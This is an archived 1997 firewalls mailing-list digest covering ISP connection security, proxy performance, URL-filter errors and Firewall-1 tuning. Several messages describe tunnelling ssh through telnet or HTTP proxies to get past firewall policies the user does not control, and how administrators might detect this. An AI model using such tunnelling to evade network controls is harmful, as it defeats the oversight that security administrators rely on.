The line will connect to our Enterprise Network through a > router at our end. We will also put a proxy server at our end to filter out > going access and do NAT. > > The ISP people say this type of connection is more secure than a direct > connection to the Internet through say MCI, because our router will be > "hidden" behind their routing system. The IP address of our router will not > be accessible from outside the ISP domain. > > We will not allow incoming connections such as telnet or ftp. We will > restrict access from inside the company to e-mail, http, ftp and probably > audio. > > My question is, how secure is this type of connection? How difficult is it > for someone outside the ISP domain to discover and access our connection? > > Thanks, > > Mariko > Scott Lupfer Network/Systems Engineer SSDS, Inc E-mail: svl@ssds.com 21NET Phone: (719) 554-9833 Voice Mail: (719) 630-0100 x206 Pager: 1-800-931-5919 A radioactive cat has eighteen half-lives! From owner-firewalls-outgoing Mon Jun 2 11:45:37 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA00503 for firewalls-outgoing; Mon, 2 Jun 1997 11:38:23 -0700 (PDT) Received: from out2.ibm.net (out2.ibm.net [165.87.194.229]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA00491 for ; Mon, 2 Jun 1997 11:38:09 -0700 (PDT) Received: from urban-s-aptiva (slip129-37-114-167.pa.us.ibm.net [129.37.114.167]) by out2.ibm.net (8.8.5/8.6.9) with SMTP id SAA52032; Mon, 2 Jun 1997 18:45:50 GMT Message-ID: <339312EA.681@urbantechnology.com> Date: Mon, 02 Jun 1997 13:39:19 -0500 From: "Urban A. Haas" Organization: Urban Technology, Inc. X-Mailer: Mozilla 3.01 (Win95; I) MIME-Version: 1.0 To: csubasi@garanti.com.tr CC: Root Admin-KSoft , Firewall Mailing List Subject: Re: SNG and performance... 
References: <338E2B0D.62A3@garanti.com.tr> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Cihan Subasi wrote: > > Root Admin-KSoft wrote: > > > > On Thu, 29 May 1997, Cihan Subasi wrote: > > > > > Anybody experienced SNG slowing down the traffic with 50+ users? > > > I checked the line utilization and SNG, and seems like SNG is the > > Depends on your config. For example do you use NAT? SOCKS? or PROXY? > > how about your filter definitions? > > > > I use both SOCKS and PROXY (telnet and ftp) The proxy users are causing this. Proxy users are running local processes on the firewall (for each proxy user, a telnet or ftp session [process] is running on the firewall). SOCKS is more efficient than proxy [processes are not created for each session] and you should be able to increase the number of users going through the firewall at once. NAT/Filters is even more efficient yet, but you would need to be at v2 of the firewall code to have that option. If you are at v1, your best bet is to have all of your users use SOCKS instead of proxies. Or, you can get more firewalls, upgrade the CPU, etc. > > > Regards, > > Kerem ERSOY > > > > > bottleneck but could it be the hardware causing this problem I believe > > > memory is enough for 100 + user (we have 128Meg on it).... -- Urban A. Haas CEO - Urban Technology, Inc. 
E-mail: uhaas@urbantechnology.com (mailto:uhaas@urbantechnology.com) Phone: (612) 938-2610 From owner-firewalls-outgoing Mon Jun 2 12:14:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA00644 for firewalls-outgoing; Mon, 2 Jun 1997 11:39:49 -0700 (PDT) Received: from zeke.gov.yk.ca (ZEKE.GOV.YK.CA [199.247.128.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA00628 for ; Mon, 2 Jun 1997 11:39:40 -0700 (PDT) Received: by zeke.gov.yk.ca; id LAA13173; Mon, 2 Jun 1997 11:48:55 -0700 (PDT) Received: from unknown(199.247.130.39) by zeke.gov.yk.ca via smap (V3.1) id xma013140; Mon, 2 Jun 97 11:48:31 -0700 Received: from [199.247.134.75] ([199.247.134.75]) by tempest.gov.yk.ca (8.7.5/8.7.3) with SMTP id LAA23266; Mon, 2 Jun 1997 11:35:27 -0700 From: Larry Kwiat To: Mariko Yashada cc: Firewalls Mailing List Subject: Re: ISP Connection Message-ID: Date: Mon, 2 Jun 1997 11:54:56 -0400 (EDT) X-Mailer: Simeon for Windows Version 4.0 X-Authentication: none MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 02 Jun 97 11:37:15 PDT Mariko Yashada wrote: - the idea of taking an ISP's word that their leased line to you through a "private" router engaged in their system is sufficient to hang the company jewels on quite securely and without a firewall... > My question is, how secure is this type of connection? How difficult is it > for someone outside the ISP domain to discover and access our connection? In my professional opinion, if an ISP salesman said that to me, I'd ask him to bring his technical people along for a discussion, where I'd ask them a whole series of techie questions the answers to which would probably be not satisfactory. That is because I work for a large integrated organization. 
If I were in the same position in a large private organization with as much value on the line as the average government, I wouldn't bother that vendor with the inquisition, I would find another ISP. In my opinion, a firewall is NECESSARY in the loop with the public internet. I wouldn't like to consider what might happen without one.
a) you don't have enough contracting authority in the usual arrangement with an ISP to ensure the proper steps are always taken on your behalf.
b) You can't manage change control at all on their system.
c) You have no assurance of high priority action on your behalf in the event of a breach of their security.
Strictly from a security management position, never mind the technicalities, I don't think what your ISP is proposing is what I would consider a good idea, if I were in your shoes... This is a personal, professional opinion. Sincerely, Larry Kwiat Information Security Coordinator Information Services Branch Department of Government Services Government of Yukon Phone: (403) 667-8081 Fax: (403) 667-5304 Netmail: kwiat@gov.yk.ca From owner-firewalls-outgoing Mon Jun 2 12:15:45 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA00877 for firewalls-outgoing; Mon, 2 Jun 1997 11:42:24 -0700 (PDT) Received: from inet02.us.abatos.com (gatekeep.us.landisgyr.com [206.175.68.122]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA00870 for ; Mon, 2 Jun 1997 11:42:18 -0700 (PDT) Received: by inet02.us.abatos.com; id OAA03537; Mon, 2 Jun 1997 14:47:36 -0400 (EDT) Received: from inet05.us.abatos.com(204.207.110.249) by gatekeep.us.landisgyr.com via smap (3.2) id xma003532; Mon, 2 Jun 97 14:47:17 -0400 Received: by news.us.landisstaefa.com; id MAA08436; Mon, 2 Jun 1997 12:46:26 -0500 Received: by USBGREXCH01 with Internet Mail Service (5.0.1457.3) id ; Mon, 2 Jun 1997 13:44:39 -0500 Message-ID: <0C673F68C3A0D011A94208002BE526253524@USBGREXCH01> From: "Kohn, Joav" To: Mariko Yashada Cc: 
Firewalls Mailing List Subject: RE: ISP Connection Date: Mon, 2 Jun 1997 13:44:33 -0500 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk unless you have a screening router (or proxy server, or firewall) at your end, you have no security at all. just because the direct route to your network is hidden doesn't give you any security. if it made it impossible for the internet to reach you, none of your internet requests would ever get back to you. no matter how you go, ISP or MCI/SPRINT/ATT, you still need to get some type of protection on your end, under your control. after all, would you want to bank your company on your internet provider? -joav kohn sr. technical consultant it/workgroup communications landis & staefa > > Date: Mon, 02 Jun 97 11:37:15 PDT > > From: Mariko Yashada > > To: Firewalls Mailing List > > Subject: ISP Connection > > > > > > > > My company is currently getting Internet access through a local ISP, > using > > PPP connections. We are now considering replacing the dial-up > connections > > with a leased line to the ISP. We will leave our web server at the > ISP and > > will continue to use their e-mail server. There will be a router at > the ISP > > end of the line. The line will connect to our Enterprise Network > through a > > router at our end. We will also put a proxy server at our end to > filter out > > going access and do NAT. > > > > The ISP people say this type of connection is more secure than a > direct > > connection to the Internet through say MCI, because our router will > be > > "hidden" behind their routing system. The IP address of our router > will not > > be accessible from outside the ISP domain. > > > > We will not allow incoming connections such as telnet or ftp. We > will > > restrict access from inside the company to e-mail, http, ftp and > probably > > audio. 
> > > > My question is, how secure is this type of connection? How difficult > is it > > for someone outside the ISP domain to discover and access our > connection? > > > > Thanks, > > > > Mariko > > From owner-firewalls-outgoing Mon Jun 2 12:30:24 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA03911 for firewalls-outgoing; Mon, 2 Jun 1997 12:14:26 -0700 (PDT) Received: from netsafe-r.bbtnet.com (netsafe-external.bbtnet.com [208.6.60.37]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id MAA03902 for ; Mon, 2 Jun 1997 12:14:17 -0700 (PDT) Received: from eve.bbtnet.com by netsafe-r.bbtnet.com via smtpd (for honor.greatcircle.com [198.102.244.44]) with SMTP; 2 Jun 1997 19:17:47 UT Received: from ss1011-tt.bbtnet.com by bbtnet.com (SMI-8.6/SMI-SVR4) id PAA29173; Mon, 2 Jun 1997 15:16:18 -0400 Received: by ss1011-tt.bbtnet.com with Microsoft Mail id <01BC6F68.54F8BA80@ss1011-tt.bbtnet.com>; Mon, 2 Jun 1997 15:19:15 -0400 Message-ID: <01BC6F68.54F8BA80@ss1011-tt.bbtnet.com> From: Tim Thayer To: "2LT Jeffery J. Lowder, 333-4615" , "bpetrie@incc.net" , "raptor-list@udc.com" , "firewalls@greatcircle.com" , "'Allen Rogers'" Subject: RE: Does Raptor WebNOT Block Legitimate Sites? Date: Mon, 2 Jun 1997 15:19:12 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Allen, any movement on this issue? We are still getting complaints from users. The most recent was URL: www.emeregency.com Tim Thayer Information Security Branch Banking & Trust >Date: Tue, 11 Mar 1997 08:21:10 -0500 (EST) >X-Sender: arogers@raptor1.raptor.com (Unverified) >To: "2LT Jeffery J. Lowder, 333-4615" , > , , >From: Allen Rogers >Subject: Re: Does Raptor WebNOT Block Legitimate Sites? > > >This is a list that Raptor licenses directly from Microsystems. 
The actual >URLs used, and their abbreviated nature, is due to how Microsystems chooses >to create their list. I am trying to open a formal path where our customers >can present queries/requests to them directly for particular sites. I will >keep you posted. > >-Allen > >At 09:29 AM 3/10/97 MST, 2LT Jeffery J. Lowder, 333-4615 wrote: >>Hello, >> >>We recently installed Raptor WebNOT to work with our Raptor Eagle 4.0 >>firewall. Remember that WebNOT can be used to block access to >>'unauthorized' sites, where 'unauthorized' is defined as sites the company >>doesn't want its employees visiting. >> >>Apparently their database of 'bad' URLs contains many truncated URLs. If >>the URL is just an IP address, everything works great. However, if the >>URL is more than an IP address -- if the URL contains a directory path, a >>filename, or both -- we've found that the URL is normally truncated when >>listed in the WebNOT database. For example, the URL for DejaNews Research >>Service, >> >>http://199.86.32.6/members/stick/ >> >>is stored in the WebNOT database (httprating.db) as >> >>http://199.86.32.6/mem >> >>Now, I don't claim to have detailed knowledge of the computer at >>199.86.32.6, but it stands to reason that there are probably multiple >>subdirectories under the /members directory. Yet Raptor WebNOT blocks >>access to ALL of these directories because apparently ONE of them contains >>nudity. >> >> >>You can imagine how much I enjoy taking heat from customers because we're >>blocking access to ostensibly legitimate sites. >> >>Am I not understanding something, or is this very poor design on Raptor's >>part? Is there anyone else out there who uses Raptor WebNOT and has >>experienced this problem? >> >>I tried calling Raptor directly to make a bug report, but since I don't >>have a maintenance contract with Raptor, the operator at Raptor customer >>support wouldn't even take my call. 
>> >>Lt Jeff Lowder >>Chief, Network Security >>United States Air Force Academy >> >>Disclaimer: The above content does not necessarily represent the views of >>the United States Government or the United States Air Force Academy. >> >> >+-----------------------------------------------------------------------+ >Allen Rogers | Raptor Systems Customer Support >arogers@raptor.com | http://www.raptor.com/cs/ >(617)487-7700 x128 | (888)-RAPTOR1 (617) 890-6532 (FAX) >+-----------------------------------------------------------------------+ > > > +-----------------------------------------------------------------------+ Allen Rogers | Raptor Systems Customer Support arogers@raptor.com | http://www.raptor.com/cs/ (617)487-7700 x128 | (888)-RAPTOR1 (617) 890-6532 (FAX) +-----------------------------------------------------------------------+ From owner-firewalls-outgoing Mon Jun 2 13:30:56 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA13877 for firewalls-outgoing; Mon, 2 Jun 1997 13:24:36 -0700 (PDT) Received: from relay.mnsinc.com (relay1.mnsinc.com [206.55.3.25]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA13861 for ; Mon, 2 Jun 1997 13:24:28 -0700 (PDT) Received: from snowball.webtrek.com (klemmerj@snowball.webtrek.com [206.239.36.10]) by relay.mnsinc.com (8.8.5/8.7.3) with SMTP id QAA00516 for ; Mon, 2 Jun 1997 16:27:58 -0400 (EDT) Date: Mon, 2 Jun 1997 16:28:20 -0400 (EDT) From: Joe Klemmer Reply-To: klemmerj@webtrek.com To: firewalls@GreatCircle.COM Subject: ipfwadm question (and procmailrc test) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I will be setting up a FW using RH Linux and ipfwadm (mainly because there's no funding to pay for a commercial product) and I have one quick question. 
It's more related to the physical setup of the FW in that, if I'm not mistaken, I'd need to put the FW PC physically in front of all the nodes in the LAN, right? IOW, it should look like this:

      Gateway Box
           |
           |
     Firewall Box
           |
           |
      LAN Router
       /   |   \
      /    |    \
     /     |     \
 Node 1  Node 2  Node 3

I know this is in the FW books (Cheswick's and Chapman's) but I haven't had time to go into them much. This is really more a sticking point in my brain, I guess. I need a better visualization of this whole thing. --- "It's a damn poor mind that can only think of one way to spell a word." -- Andrew Jackson From owner-firewalls-outgoing Mon Jun 2 14:16:18 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA18550 for firewalls-outgoing; Mon, 2 Jun 1997 14:02:13 -0700 (PDT) Received: from quix.robins.af.mil (quix.robins.af.mil [137.244.193.103]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA18503 for ; Mon, 2 Jun 1997 14:02:00 -0700 (PDT) Received: by quix.robins.af.mil; (5.65v3.2/1.1.8.2/01Nov95-0110PM) id AA22662; Mon, 2 Jun 1997 17:06:38 -0400 From: "Mr. Jolt Cola" Message-Id: <9706022106.AA22662@quix.robins.af.mil> Subject: Banyan ports through firewall? To: firewalls@greatcircle.com Date: Mon, 2 Jun 1997 17:06:38 -0400 (EDT) X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Could someone tell me what ports Banyan uses to communicate? I searched the web and came up with tcp and udp 567 and 573. The servers still do not talk through the firewall with these ports open. Any ideas? I'll probably just go out and do some packet sniffing but I was hoping someone here knew. 
Thanks, Melvin Smith From owner-firewalls-outgoing Mon Jun 2 15:11:43 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA20185 for firewalls-outgoing; Mon, 2 Jun 1997 14:18:54 -0700 (PDT) Received: from pse01.pios.com (PSE01.PIOS.COM [199.33.129.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA20166 for ; Mon, 2 Jun 1997 14:18:43 -0700 (PDT) Received: by pse01.pios.com; (5.65v3.2/1.3/10May95) id AA13963; Mon, 2 Jun 1997 17:21:56 -0400 Received: from vaxa.PIOS.COM (vaxa.PIOS.COM) by gemini.pios.com (PMDF V5.0-6 #18985) id <01IJLSJK4A688WWM05@gemini.pios.com> for firewalls@greatcircle.com; Mon, 02 Jun 1997 17:23:51 -0400 (EDT) Received: from cal_177.sanjose (192.168.14.7) by PIOS.PIOS.COM (PMDF V5.0-6 #18984) id <01IJLSHA50PS8Y53R1@PIOS.PIOS.COM> for firewalls@greatcircle.com; Mon, 02 Jun 1997 17:22:02 -0400 (EDT) Date: Mon, 02 Jun 1997 14:25:43 -0700 From: Bill Stout Subject: Performance and FR question X-Sender: stoutb@vaxf.pios.com To: firewalls@greatcircle.com Message-Id: <2.2.32.19970602212543.006e1e94@vaxf.pios.com> Mime-Version: 1.0 X-Mailer: Windows Eudora Pro Version 2.2 (32) Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anyone noticed performance issues with Frame Relay connections to the internet? Many years ago I connected offices together via 'secure' FR VPNs (I know better now), and noticed that WAN performance increased if I shrunk the MTU to a multiple of 128 - 768 working best in my situation. I'm guessing this is because of the X.25 parentage of FR (packet size). Are others adjusting the size of the MTU on the internet side of their firewalls? Because of the presence of FR on the net, is this something all feeds should worry about? Will ATM backbones impact packet size? Am I just imagining this or was this a situational fluke? 
Bill Stout _____________________________________________________________________________ Bill Stout (Systems Engineer/Consultant) stoutb@pios.com Pioneer Standard (Computer Systems & Components) http://www.pios.com/ San Jose, CA (Location of 1 of 52 U.S. offices) (408) 954-9100 *My opinions do not reflect that of the company, and vice versa, thankfully.* From owner-firewalls-outgoing Mon Jun 2 16:00:39 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA01638 for firewalls-outgoing; Mon, 2 Jun 1997 15:47:48 -0700 (PDT) Received: from mail.sla.com (mail1.sla.com [207.153.168.35]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA01579 for ; Mon, 2 Jun 1997 15:47:36 -0700 (PDT) Received: by mail1.sla.com with Internet Mail Service (5.0.1457.3) id ; Mon, 2 Jun 1997 15:50:48 -0700 Message-ID: <31557D725263D011B53A0060974FB8DC028B58@mail1.sla.com> From: Bill Stackpole To: "'Mr. Jolt Cola'" Cc: "'firewalls@greatcircle.com'" Subject: RE: Banyan ports through firewall? Date: Mon, 2 Jun 1997 15:50:46 -0700 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Banyan says port 573 for udp and 83 for tcp. I haven't tried these yet but I will be setting up a firewall shortly so let me know if they work. Thanks. "Simplify - There is no value in complexity, it's too difficult to manage." Bill Stackpole, CISSP Seitel Leeds & Associates Voice: 206.283.4355 2 Nickerson St. Suite 201 Email: bstackpole@sla.com Seattle, Wa 98109 > -----Original Message----- > From: Mr. Jolt Cola [SMTP:msmith@quix.robins.af.mil] > Sent: Monday, June 02, 1997 2:07 PM > To: firewalls@greatcircle.com > Subject: Banyan ports through firewall? > > Could someone tell me what ports Banyan uses to communicate? > I searched the web and came up with tcp and udp 567 and 573. > The servers still do not talk through the firewall with these > ports open. 
Any ideas? I'll probably just go out and do some > packet sniffing but I was hoping someone here knew. > > Thanks, > > Melvin Smith From owner-firewalls-outgoing Mon Jun 2 16:36:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA04535 for firewalls-outgoing; Mon, 2 Jun 1997 16:07:15 -0700 (PDT) Received: from ormail.intel.com (ormail.intel.com [134.134.248.3]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA04509 for ; Mon, 2 Jun 1997 16:07:08 -0700 (PDT) Received: from zonn-new.hf.intel.com (zonn-new.hf.intel.com [143.181.153.134]) by ormail.intel.com (8.8.4/8.8.4) with ESMTP id QAA29097 for ; Mon, 2 Jun 1997 16:10:19 -0700 (PDT) Message-ID: <3393536C.4A06865E@crl.com> Date: Mon, 02 Jun 1997 16:12:44 -0700 From: "Zot O'Connor" Reply-To: zot@crl.com Organization: Zot Consulting X-Mailer: Mozilla 4.0b3 [en] (Win95; I) MIME-Version: 1.0 To: Firewalls list Subject: ssh proxy for tn-gw X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here is info from the README. This requires a host to have tn-gw on the receiving end. Apparently tn-gw uses several characters as codes and tn-gw-nav escapes these for the client, and then unescapes them for the server. This works for me since I go to many clients who have tn-gw up and I cannot control the firewall. Once out to my home, I can ssh to the site I need.

What is it?
-----------
tn-gw-nav is a program to allow you to use SSH (http://www.cs.hut.fi/ssh/) to connect to a host which is on the outside of a TIS fwtk derived telnet gateway. The host on the outside must also be configured to use tn-gw-nav.

Getting the Source
------------------
ftp://ftp.nlc.net.au/pub/unix/tn-gw-nav

Contact the Authors
-------------------
John Saunders
Charlie Brady

How does it work?
-----------------
SSH has a feature which allows you to use a program as a proxy to establish a connection to the SSHD server. One of the functions of tn-gw-nav is to negotiate the connection through the telnet gateway. The other function of tn-gw-nav is to create a clean 8 bit stream between ssh and sshd after the connection is created. The telnet gateway unfortunately treats a few characters as special - these need to be escaped to traverse the gateway safely, then unescaped before being fed to the SSHD server. Because tn-gw-nav must run at both ends of the connection, it does not directly provide a general solution to using ssh through the telnet gateway. Once you have one ssh connection with a tn-gw-nav equipped host, however, you will then be able to use ssh from there to anywhere else using ssh. If the unescaping code was added to sshd, enabled on a host by host basis through a config entry in /etc/sshd_config, then tn-gw-nav would only be required at the SSH client end. A patch for SSHD is on the TODO list. 
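The README above describes the second job of tn-gw-nav, turning the ssh byte stream into something the telnet gateway will not mangle and restoring it on the far side, without saying which bytes are special or how they are escaped. The following is an added example written for this page, not tn-gw-nav's code: it assumes (as a constructed model, not a statement about tn-gw) that the gateway is sensitive to 0xFF (telnet IAC) and to CR, uses 0x1B as the escape byte, and shows a streaming decoder that survives an escape pair being split across two reads, plus a toy gateway that shows what happens to an unescaped stream.

```python
"""Added illustration, not tn-gw-nav's own code, of the escape/unescape layer
the README describes: an 8-bit ssh stream is made safe to pass through a
telnet gateway that treats a few bytes as special, then restored on the far
side. Assumptions (constructed for this example, not taken from tn-gw-nav):
the gateway is sensitive to 0xFF (telnet IAC) and CR (0x0D), and 0x1B is
used as the escape byte."""

ESC = 0x1B
# Bytes the modelled gateway would interpret; ESC itself must be in the set
# so that a literal 0x1B in the payload can be carried.
SPECIAL = frozenset({0xFF, 0x0D, ESC})
# XOR with 0x40 maps every special byte to a byte that is not special, so an
# escaped pair never reintroduces a problem byte.
assert not {b ^ 0x40 for b in SPECIAL} & SPECIAL


def escape(data):
    """Client side: replace each special byte with ESC followed by byte ^ 0x40."""
    out = bytearray()
    for b in data:
        if b in SPECIAL:
            out.append(ESC)
            out.append(b ^ 0x40)
        else:
            out.append(b)
    return bytes(out)


class Unescaper:
    """Server side: streaming decoder. Keeps state across feed() calls so an
    escape sequence split between two reads is still decoded correctly."""

    def __init__(self):
        self._pending = False  # True when the last byte seen was ESC

    def feed(self, chunk):
        out = bytearray()
        for b in chunk:
            if self._pending:
                out.append(b ^ 0x40)
                self._pending = False
            elif b == ESC:
                self._pending = True
            else:
                out.append(b)
        return bytes(out)


def toy_gateway(data):
    """Constructed model of a telnet-style gateway, only to show the failure
    mode: 0xFF starts a command so it and the following byte are consumed,
    and a bare CR becomes the NVT line ending CR LF. Not real tn-gw behaviour."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b == 0xFF:
            i += 2
            continue
        if b == 0x0D:
            out += b"\r\n"
        else:
            out.append(b)
        i += 1
    return bytes(out)


def send_through(data, chunk_size):
    """Escape, pass through the modelled gateway, and unescape in reads of
    chunk_size bytes (small values split escape pairs across reads)."""
    wire = toy_gateway(escape(data))
    decoder = Unescaper()
    out = bytearray()
    for i in range(0, len(wire), chunk_size):
        out += decoder.feed(wire[i:i + chunk_size])
    return bytes(out)
```

In ssh the "program as a proxy" feature the README refers to is the ProxyCommand directive; in this scheme the escaping side lives in that program and the unescaping side in a wrapper in front of sshd, which is why both ends must carry tn-gw-nav until sshd itself learns to unescape.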
Zot O'Connor

From owner-firewalls-outgoing Mon Jun 2 17:15:08 1997
From: "Ferrell-1, Ema"
To: "'firewalls@greatcircle.com'"
Subject: Difference between NAT and IP Masquerading
Date: Mon, 2 Jun 1997 19:13:48 -0400

Hi All,

Could someone explain the difference between Network Address Translation and IP Masquerading? Which is better to use? What firewall products offer which?
TIA,
Ema Ferrell
Checkout & Launch Control System
Hardware Design Division Support
Networks/DE-CLC-A
407-861-xxxx (phone #)
407-861-7470 (fax #)

From owner-firewalls-outgoing Mon Jun 2 17:45:16 1997
Message-Id: <3.0.1.32.19970602183756.006891b0@m2.sprynet.com>
Date: Mon, 02 Jun 1997 18:37:56 -0600
To: "Maurizio Fiocchi"
From: Peter Carlson
Subject: Re: PIX and Firewall-1
In-Reply-To: <199706021345.MAA09733@otmfire.otm.it>

There are many comparisons made by datacomm, lan times, ziff-davis and others. Keep in mind that both pix and fw-1 are glorified packet filters, even though they have a fancy name for it. I would stick with an application level gateway. They are well accepted and known for being more secure.

-Peter

At 12:33 PM 6/2/97 +0200, Maurizio Fiocchi wrote:
>I am appraising two firewalls, the first Pix and the second Firewall-1.
>From an attentive analysis I have noticed that the two SW have a notable
>difference regarding the characteristics of administration and of
>performance.
>
>I was wondering whether an analysis or a comparison between the two SW exists,
>so that I could choose without mistake?
>
>Do available documents exist?
>
>Thank you
>

From owner-firewalls-outgoing Mon Jun 2 18:00:34 1997
Message-Id: <3.0.1.32.19970602183402.00689ff8@m2.sprynet.com>
Date: Mon, 02 Jun 1997 18:34:02 -0600
To: Bill Stout, firewalls@GreatCircle.COM
From: Peter Carlson
Subject: Re: NSC Firewall experience?
In-Reply-To: <2.2.32.19970530220016.00adbcb8@vaxf.pios.com>

A whole bunch of headaches. I used to work for a company that had NSC routers implemented; besides shoddy code, ridiculous support and routers that just didn't function according to the basic theories of routing, they didn't have too bad of a product. ;-)

-Peter

At 03:00 PM 5/30/97 -0700, Bill Stout wrote:
>NSC Firewalls were recommended by a consulting firm for a customer. From
>what I can determine from their website so far, BorderGuard/NetSentry
>products are basically filtering routers, not firewalls. So far I don't see
>a difference between NSC BorderGuard and normal Cisco routers' capability to
>do extended filtering and VPNs.
>
>What am I missing? Comments?
>
>
>_____________________________________________________________________________
>Bill Stout (Systems Engineer/Consultant) stoutb@pios.com
>Pioneer Standard (Computer Systems & Components) http://www.pios.com/
>San Jose, CA (Location of 1 of 52 U.S. offices) (408) 954-9100
>*My opinions do not reflect that of the company, and vice-versa, thankfully.*
>

From owner-firewalls-outgoing Mon Jun 2 18:45:09 1997
From: girsch@marben.com (Arnaud Girsch)
Message-Id: <199706030143.SAA22532@mail.marben.com>
Subject: Re: ssh proxy for fwtk
To: pnash@hanshan.bbnplanet.com
Date: Mon, 2 Jun 1997 18:43:28 -0700 (PDT)
Cc: don@genroco.com, jpm@marben.be, ark@paranoid.convey.ru, tobotras@jet.msk.su, fwtk-users@tis.com, firewalls@greatcircle.com, ylo@cs.hut.fi
In-Reply-To: <19970528182528.5140.qmail@hanshan.bbnplanet.com> from "pnash@hanshan.bbnplanet.com" at May 28, 97 02:25:28 pm
X-Organization: Marben Products, Inc. / DSET Corporation

> I think they're looking for something a bit more covert, so that they
> don't have to get their firewall admin to setup a plug.. Tunneling
> always brings up interesting problems when trying to control users.. Does
> anyone know if there are "intelligent" proxies that can detect when the
> proxy connects to a ssh server, or whatever via the various handshaking
> that partakes. Even if it just looks for "SSH-1.5-1.2.20" or somesuch, it
> can alert you to users getting around your policy.
> In my mind, ssh is the easiest way to get around security policies
> provided you have access to a telnet proxy or http proxy.. Tunnel through
> the proxy to a remote site, and now you have access to X, tunnel whatever
> apps you want, ftp files, etc.. It's all encrypted so the admin would
> never know..

Although you have a valid point that proxies are an open door to get around security policies, I think you have to first think why you have a policy in the first place. Do you restrict the access because you want to restrict your users or because you want to secure your network? For example, you probably restrict X because you think that X is never secure and can be abused, etc ... Giving access to X within a ssh tunnel protects against most of the X problems, so why not give X access then? ftp'ing files is another matter, as the transit is not the only concern in that case.

As an admin ... do you want to know exactly what your users are doing? Sure, you want to know what kind of stuff they're doing, but you don't want to know what's inside the stuff they're doing .... If you can give them access to some resources (X, etc ...) in a secure manner, I don't see any reason why you should not.

Maybe I'm wrong and missed something :-)

Arnaud.

Note: "you" wasn't directed to one person directly :-)

--
Arnaud Girsch -+- Marben Products, Inc.
/ DSET Corporation - San Jose, CA
agirsch@marben.com -+- http://www.marben.com/ -+- http://www.dset.com/

From owner-firewalls-outgoing Mon Jun 2 23:00:27 1997
Date: Mon, 2 Jun 1997 16:01:30 +1000 (EST)
From: Warpy
To: firewalls@GreatCircle.COM
Subject: SSH Equiv for FTP?

I was wondering whether there was an equivalent to SSH for ftp. Does anyone know if there is?

Warpy

From owner-firewalls-outgoing Mon Jun 2 23:30:08 1997
Date: Tue, 3 Jun 1997 14:16:42 -0800
From: drexx@pspi.com.ph (Drexx Laggui)
Message-Id: <199706032216.OAA16536@sunphil>
To: fw-1-mailinglist@us.checkpoint.com, solid@mozcom.com, firewalls@greatcircle.com
Subject: Re: [FW1] Performance monitoring for FW-1

|> From: "Jet B. Bagadion"
|>
|> Hello everybody,
|>
|> How will I monitor Firewall-1 performance? Please send some tips on how I
|> can improve its performance.
|>

Hello Jet,

1] On Sun H/W:

1.1] On a Sun Solaris platform, the easiest way is to use the Performance Meter (/usr/openwin/bin/perfmeter). Just right-mouse click to get to the Properties menu and select the parameters you'd like to monitor (CPU, RAM, network utilization, etc.)

1.2] On checking the FW-1 host disk activity, do

    prompt# iostat -x 30

Look at the b values (from the whole 30 samples) and average them. If it's more than 35% utilized then it is rather busy. Either stripe it or get a faster disk then.

1.3] For checking network performance, do

    prompt# netstat -i 30

A network output with too many collisions reduces throughput and increases response time. Upgrade to a faster network if necessary.

1.4] On CPU and memory rules, use

    prompt# vmstat 30

If the "swap" values are (1000k <= 10000k) or worse, then the system may soon run out of virtual memory. Try to add more swap.

If the "sr" values are (200 <= 300), then the system is scanning through memory looking for more pages to free at a high rate. This indicates that, as well as inactive pages, active pages may be stolen from processes.

If the "r" values are from (3 <= 5), then there is insufficient CPU power. Jobs are spending an increasing amount of time in the queue before being assigned to a CPU. This reduces throughput and increases response time.

2.0] On the FW-1 application, do

    prompt# fw ctl pstat

If too low, edit the /etc/system file with fw:fwhmem=0x100000 (~1MB RAM).

